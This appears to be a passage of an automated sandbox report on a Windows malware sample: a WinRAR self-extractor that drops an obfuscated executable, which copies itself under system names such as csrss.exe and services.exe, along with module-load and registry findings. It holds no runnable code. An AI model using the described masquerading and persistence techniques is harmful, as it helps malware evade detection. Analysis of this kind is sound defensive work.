Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wininet.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: miutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wmidcom.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wbemcomn.dll
Source: C:\Windows\System32\cmd.exe Section loaded: cmdext.dll
Source: C:\Windows\System32\cmd.exe Section loaded: apphelp.dll
Source: C:\Windows\System32\chcp.com Section loaded: ulib.dll
Source: C:\Windows\System32\chcp.com Section loaded: fsutilext.dll
Source: C:\Windows\System32\PING.EXE Section loaded: iphlpapi.dll
Source: C:\Windows\System32\PING.EXE Section loaded: mswsock.dll
Source: C:\Windows\System32\PING.EXE Section loaded: dnsapi.dll
Source: C:\Windows\System32\PING.EXE Section loaded: rasadhlp.dll
Source: C:\Windows\System32\PING.EXE Section loaded: fwpuclnt.dll
Source: C:\Windows\System32\PING.EXE Section loaded: winnsi.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: fastprox.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: ncobjapi.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: mpclient.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: userenv.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: version.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: msasn1.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: wmitomi.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: mi.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: miutils.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: miutils.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: gpapi.dll
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Section loaded: mscoree.dll
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Section loaded: apphelp.dll
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Section loaded: kernel.appcore.dll
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Section loaded: version.dll
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Section loaded: uxtheme.dll
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Section loaded: windows.storage.dll
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Section loaded: wldp.dll
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Section loaded: profapi.dll
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Section loaded: cryptsp.dll
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Section loaded: rsaenh.dll
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Section loaded: cryptbase.dll
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Section loaded: sspicli.dll
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Section loaded: ktmw32.dll
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Section loaded: rasapi32.dll
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Section loaded: rasman.dll
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Section loaded: rtutils.dll
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Section loaded: mswsock.dll
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Section loaded: winhttp.dll
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Section loaded: iphlpapi.dll
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Section loaded: dhcpcsvc6.dll
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Section loaded: dhcpcsvc.dll
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Section loaded: dnsapi.dll
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Section loaded: winnsi.dll
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Section loaded: rasadhlp.dll
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Section loaded: fwpuclnt.dll
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Section loaded: wbemcomn.dll
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Section loaded: dwrite.dll
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Section loaded: edputil.dll
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Section loaded: amsi.dll
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Section loaded: userenv.dll
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Section loaded: winmm.dll
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Section loaded: winmmbase.dll
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Section loaded: mmdevapi.dll
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Section loaded: devobj.dll
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Section loaded: ksuser.dll
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Section loaded: avrt.dll
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Section loaded: audioses.dll
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Section loaded: powrprof.dll
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Section loaded: umpdc.dll
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Section loaded: msacm32.dll
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Section loaded: midimap.dll
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Section loaded: windowscodecs.dll
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Section loaded: ntmarta.dll
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Section loaded: dpapi.dll
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Section loaded: secur32.dll
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Section loaded: schannel.dll
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Section loaded: mskeyprotect.dll
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Section loaded: ntasn1.dll
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Section loaded: ncrypt.dll
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Section loaded: ncryptsslp.dll
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Section loaded: msasn1.dll
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Section loaded: gpapi.dll
Source: C:\Windows\System32\svchost.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\svchost.exe Section loaded: qmgr.dll
Source: C:\Windows\System32\svchost.exe Section loaded: bitsperf.dll
Source: C:\Windows\System32\svchost.exe Section loaded: powrprof.dll
Source: C:\Windows\System32\svchost.exe Section loaded: xmllite.dll
Source: C:\Windows\System32\svchost.exe Section loaded: firewallapi.dll
Source: C:\Windows\System32\svchost.exe Section loaded: esent.dll
Source: C:\Windows\System32\svchost.exe Section loaded: umpdc.dll
Source: C:\Windows\System32\svchost.exe Section loaded: dnsapi.dll
Source: C:\Windows\System32\svchost.exe Section loaded: iphlpapi.dll
Source: C:\Windows\System32\svchost.exe Section loaded: fwbase.dll
Source: C:\Windows\System32\svchost.exe Section loaded: wldp.dll
Source: C:\Windows\System32\svchost.exe Section loaded: ntmarta.dll
Source: C:\Windows\System32\svchost.exe Section loaded: profapi.dll
Source: C:\Windows\System32\svchost.exe Section loaded: flightsettings.dll
Source: C:\Windows\System32\svchost.exe Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe Section loaded: netprofm.dll
Source: C:\Windows\System32\svchost.exe Section loaded: npmproxy.dll
Source: C:\Windows\System32\svchost.exe Section loaded: bitsigd.dll
Source: C:\Windows\System32\svchost.exe Section loaded: upnp.dll
Source: C:\Windows\System32\svchost.exe Section loaded: winhttp.dll
Source: C:\Windows\System32\svchost.exe Section loaded: ssdpapi.dll
Source: C:\Windows\System32\svchost.exe Section loaded: urlmon.dll
Source: C:\Windows\System32\svchost.exe Section loaded: iertutil.dll
Source: C:\Windows\System32\svchost.exe Section loaded: srvcli.dll
Source: C:\Windows\System32\svchost.exe Section loaded: netutils.dll
Source: C:\Windows\System32\svchost.exe Section loaded: appxdeploymentclient.dll
Source: C:\Windows\System32\svchost.exe Section loaded: cryptbase.dll
Source: C:\Windows\System32\svchost.exe Section loaded: wsmauto.dll
Source: C:\Windows\System32\svchost.exe Section loaded: miutils.dll
Source: C:\Windows\System32\svchost.exe Section loaded: wsmsvc.dll
Source: C:\Windows\System32\svchost.exe Section loaded: dsrole.dll
Source: C:\Windows\System32\svchost.exe Section loaded: pcwum.dll
Source: C:\Windows\System32\svchost.exe Section loaded: mi.dll
Source: C:\Windows\System32\svchost.exe Section loaded: userenv.dll
Source: C:\Windows\System32\svchost.exe Section loaded: gpapi.dll
Source: C:\Windows\System32\svchost.exe Section loaded: winhttp.dll
Source: C:\Windows\System32\svchost.exe Section loaded: wkscli.dll
Source: C:\Windows\System32\svchost.exe Section loaded: netutils.dll
Source: C:\Windows\System32\svchost.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\svchost.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\svchost.exe Section loaded: msv1_0.dll
Source: C:\Windows\System32\svchost.exe Section loaded: ntlmshared.dll
Source: C:\Windows\System32\svchost.exe Section loaded: cryptdll.dll
Source: C:\Windows\System32\svchost.exe Section loaded: webio.dll
Source: C:\Windows\System32\svchost.exe Section loaded: mswsock.dll
Source: C:\Windows\System32\svchost.exe Section loaded: winnsi.dll
Source: C:\Windows\System32\svchost.exe Section loaded: fwpuclnt.dll
Source: C:\Windows\System32\svchost.exe Section loaded: rasadhlp.dll
Source: C:\Windows\System32\svchost.exe Section loaded: rmclient.dll
Source: C:\Windows\System32\svchost.exe Section loaded: usermgrcli.dll
Source: C:\Windows\System32\svchost.exe Section loaded: execmodelclient.dll
Source: C:\Windows\System32\svchost.exe Section loaded: propsys.dll
Source: C:\Windows\System32\svchost.exe Section loaded: coremessaging.dll
Source: C:\Windows\System32\svchost.exe Section loaded: twinapi.appcore.dll
Source: C:\Windows\System32\svchost.exe Section loaded: onecorecommonproxystub.dll
Source: C:\Windows\System32\svchost.exe Section loaded: execmodelproxy.dll
Source: C:\Windows\System32\svchost.exe Section loaded: resourcepolicyclient.dll
Source: C:\Windows\System32\svchost.exe Section loaded: vssapi.dll
Source: C:\Windows\System32\svchost.exe Section loaded: vsstrace.dll
Source: C:\Windows\System32\svchost.exe Section loaded: samcli.dll
Source: C:\Users\user\Desktop\Vqzx4PFehn.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{00BB2765-6A77-11D0-A535-00C04FD7D062}\InProcServer32 Jump to behavior
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll Jump to behavior
Source: C:\portintosvc\driverInto.exe Directory created: C:\Program Files\Windows Security\BrowserCore\en-US\XXPWErhsUbDrk.exe Jump to behavior
Source: C:\portintosvc\driverInto.exe Directory created: C:\Program Files\Windows Security\BrowserCore\en-US\931b00cae9730a Jump to behavior
Source: Vqzx4PFehn.exe Static file information: File size 1789751 > 1048576
Source: Vqzx4PFehn.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: Vqzx4PFehn.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: Vqzx4PFehn.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: Vqzx4PFehn.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: Vqzx4PFehn.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: Vqzx4PFehn.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
Source: Vqzx4PFehn.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
Source: Vqzx4PFehn.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: Binary string: D:\Projects\WinRAR\sfx\build\sfxrar32\Release\sfxrar.pdb source: Vqzx4PFehn.exe
Source: Vqzx4PFehn.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: Vqzx4PFehn.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: Vqzx4PFehn.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: Vqzx4PFehn.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: Vqzx4PFehn.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
File is packed with WinRar
Source: C:\Users\user\Desktop\Vqzx4PFehn.exe File created: C:\portintosvc\__tmp_rar_sfx_access_check_6348156 Jump to behavior
PE file contains sections with non-standard names
Source: Vqzx4PFehn.exe Static PE information: section name: .didat
Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\user\Desktop\Vqzx4PFehn.exe Code function: 0_2_0101F640 push ecx; ret 0_2_0101F653
Source: C:\Users\user\Desktop\Vqzx4PFehn.exe Code function: 0_2_0101EB78 push eax; ret 0_2_0101EB96
Source: C:\portintosvc\driverInto.exe Code function: 4_2_00007FFD9BAC4B99 push ebp; retf 4_2_00007FFD9BAC4BA2
Source: C:\portintosvc\driverInto.exe Code function: 4_2_00007FFD9BEBF167 push esi; ret 4_2_00007FFD9BEBF170
Source: C:\portintosvc\driverInto.exe Code function: 4_2_00007FFD9BEBF10B push eax; ret 4_2_00007FFD9BEBF10C
Source: C:\portintosvc\driverInto.exe Code function: 4_2_00007FFD9BEBF000 push edi; ret 4_2_00007FFD9BEBF001
Source: driverInto.exe.0.dr Static PE information: section name: .text entropy: 7.542871166746595
Source: csrss.exe.4.dr Static PE information: section name: .text entropy: 7.542871166746595
Source: services.exe.4.dr Static PE information: section name: .text entropy: 7.542871166746595
Source: XXPWErhsUbDrk.exe.4.dr Static PE information: section name: .text entropy: 7.542871166746595
Source: XXPWErhsUbDrk.exe0.4.dr Static PE information: section name: .text entropy: 7.542871166746595
Source: XXPWErhsUbDrk.exe1.4.dr Static PE information: section name: .text entropy: 7.542871166746595

Persistence and Installation Behavior
barindex
Drops PE files with benign system names
Source: C:\portintosvc\driverInto.exe File created: C:\Windows\Registration\csrss.exe Jump to dropped file
Source: C:\portintosvc\driverInto.exe File created: C:\Program Files (x86)\Windows Defender\services.exe Jump to dropped file
Drops PE files
Source: C:\portintosvc\driverInto.exe File created: C:\Recovery\XXPWErhsUbDrk.exe Jump to dropped file
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe File created: C:\Users\user\Desktop\nntxgNlb.log Jump to dropped file
Source: C:\portintosvc\driverInto.exe File created: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Jump to dropped file
Source: C:\portintosvc\driverInto.exe File created: C:\Users\user\Desktop\cvopZsny.log Jump to dropped file
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe File created: C:\Users\user\Desktop\fJkHwTWu.log Jump to dropped file
Source: C:\portintosvc\driverInto.exe File created: C:\Windows\Registration\csrss.exe Jump to dropped file
Source: C:\portintosvc\driverInto.exe File created: C:\Program Files\Windows Security\BrowserCore\en-US\XXPWErhsUbDrk.exe Jump to dropped file
Source: C:\portintosvc\driverInto.exe File created: C:\Program Files (x86)\Windows Defender\services.exe Jump to dropped file
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe File created: C:\Users\user\Desktop\VaRrMrQM.log Jump to dropped file
Source: C:\portintosvc\driverInto.exe File created: C:\Users\user\Desktop\uCFUtfTN.log Jump to dropped file
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe File created: C:\Users\user\Desktop\TQvqMYlM.log Jump to dropped file
Source: C:\Users\user\Desktop\Vqzx4PFehn.exe File created: C:\portintosvc\driverInto.exe Jump to dropped file
Source: C:\portintosvc\driverInto.exe File created: C:\Users\user\Desktop\DtICHrzA.log Jump to dropped file
Source: C:\portintosvc\driverInto.exe File created: C:\Users\user\Desktop\SHKzphsQ.log Jump to dropped file
Source: C:\portintosvc\driverInto.exe File created: C:\Users\user\Desktop\EqkKdrOv.log Jump to dropped file
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe File created: C:\Users\user\Desktop\mqRpKNWg.log Jump to dropped file
Drops PE files to the windows directory (C:\Windows)
Source: C:\portintosvc\driverInto.exe File created: C:\Windows\Registration\csrss.exe Jump to dropped file
Drops files with a non-matching file extension (content does not match file extension)
Source: C:\portintosvc\driverInto.exe File created: C:\Users\user\Desktop\DtICHrzA.log Jump to dropped file
Source: C:\portintosvc\driverInto.exe File created: C:\Users\user\Desktop\EqkKdrOv.log Jump to dropped file
Source: C:\portintosvc\driverInto.exe File created: C:\Users\user\Desktop\uCFUtfTN.log Jump to dropped file
Source: C:\portintosvc\driverInto.exe File created: C:\Users\user\Desktop\cvopZsny.log Jump to dropped file
Source: C:\portintosvc\driverInto.exe File created: C:\Users\user\Desktop\SHKzphsQ.log Jump to dropped file
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe File created: C:\Users\user\Desktop\mqRpKNWg.log Jump to dropped file
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe File created: C:\Users\user\Desktop\nntxgNlb.log Jump to dropped file
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe File created: C:\Users\user\Desktop\fJkHwTWu.log Jump to dropped file
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe File created: C:\Users\user\Desktop\VaRrMrQM.log Jump to dropped file
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe File created: C:\Users\user\Desktop\TQvqMYlM.log Jump to dropped file

Hooking and other Techniques for Hiding and Protection
barindex
Loading BitLocker PowerShell Module
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Source: C:\portintosvc\driverInto.exe Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdate Jump to behavior
Source: C:\portintosvc\driverInto.exe Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot Jump to behavior
Source: C:\Users\user\Desktop\Vqzx4PFehn.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\portintosvc\driverInto.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\portintosvc\driverInto.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\portintosvc\driverInto.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\portintosvc\driverInto.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\portintosvc\driverInto.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\portintosvc\driverInto.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\portintosvc\driverInto.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\portintosvc\driverInto.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\portintosvc\driverInto.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\portintosvc\driverInto.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\portintosvc\driverInto.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\portintosvc\driverInto.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
